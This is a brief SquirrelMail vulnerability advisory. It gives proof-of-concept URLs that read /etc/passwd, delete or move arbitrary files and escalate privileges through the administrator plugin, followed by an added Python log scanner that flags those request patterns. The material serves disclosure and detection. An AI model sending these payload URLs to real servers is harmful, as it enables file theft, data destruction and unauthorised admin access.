Squirrelmail Multiple Remote Vulnerabilities
The following proof of concept examples have been supplied:

File disclosure: http://www.example.com/src/read_body.php?mailbox=/etc/passwd&passed_id=1&

File deletion: http://www.example.com/src/delete_message.php?mailbox=[filehere]&message=1

File moving: http://www.example.com/src/move_messages.php?msg=1&mailbox=[file_you_want_to_move]&startMessage=1&targetMailbox=[target_mailbox_here]

File download: http://www.example.com/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd

Privilege escalation: http://www.example.com/plugins/administrator/options.php?username="root"&adm_Group1=//Find it from file:plugins/administrator/admins//&off=true&key=$
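
A defensive log check for the request patterns listed above, as an added example that is not part of the original advisory. The log layout (client address followed by a quoted request line), the sample lines and both heuristics (a `mailbox` value that is a filesystem path; the administrator plugin called with `username` in the query string) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts named in the advisory whose `mailbox` parameter is abused.
MAILBOX_SCRIPTS = ("/src/read_body.php", "/src/delete_message.php",
                   "/src/move_messages.php", "/src/download.php")
ADMIN_SCRIPT = "/plugins/administrator/options.php"
# Assumed log layout: client address first, then a quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*"')

def classify(target):
    """Return reasons why a request target resembles one of the listed PoCs."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes
    reasons = []
    if parts.path.endswith(MAILBOX_SCRIPTS):
        for value in params.get("mailbox", []):
            # Heuristic (assumption): a folder name is not an absolute path
            # and has no ".." path segment.
            if value.startswith("/") or ".." in value.split("/"):
                reasons.append("mailbox is a filesystem path: " + value)
    if parts.path.endswith(ADMIN_SCRIPT) and "username" in params:
        # Heuristic (assumption): the username is not normally passed in the URL.
        reasons.append("administrator plugin called with username in query string")
    return reasons

def scan(lines):
    """Return (client, reason) pairs for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m:
            hits.extend((m.group(1), r) for r in classify(m.group(2)))
    return hits

# Constructed sample log lines (documentation address ranges), not real traffic.
_TS = ' - - [01/Jan/2024:00:00:00 +0000] "GET '
SAMPLE_LOG = [
    "192.0.2.10" + _TS + '/src/read_body.php?mailbox=INBOX&passed_id=1 HTTP/1.1" 200 512',
    "198.51.100.7" + _TS + '/src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1" 200 900',
    "198.51.100.7" + _TS + '/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=%2Fetc%2Fpasswd HTTP/1.1" 200 900',
    "192.0.2.10" + _TS + '/src/download.php?absolute_dl=true&passed_id=3&passed_ent_id=2&mailbox=INBOX.Sent HTTP/1.1" 200 4096',
    "203.0.113.5" + _TS + '/plugins/administrator/options.php?username=%22root%22&adm_Group1=x&off=true HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(client, reason)
```

The check decodes percent-encoding before matching, so `%2Fetc%2Fpasswd` is flagged the same way as the literal path.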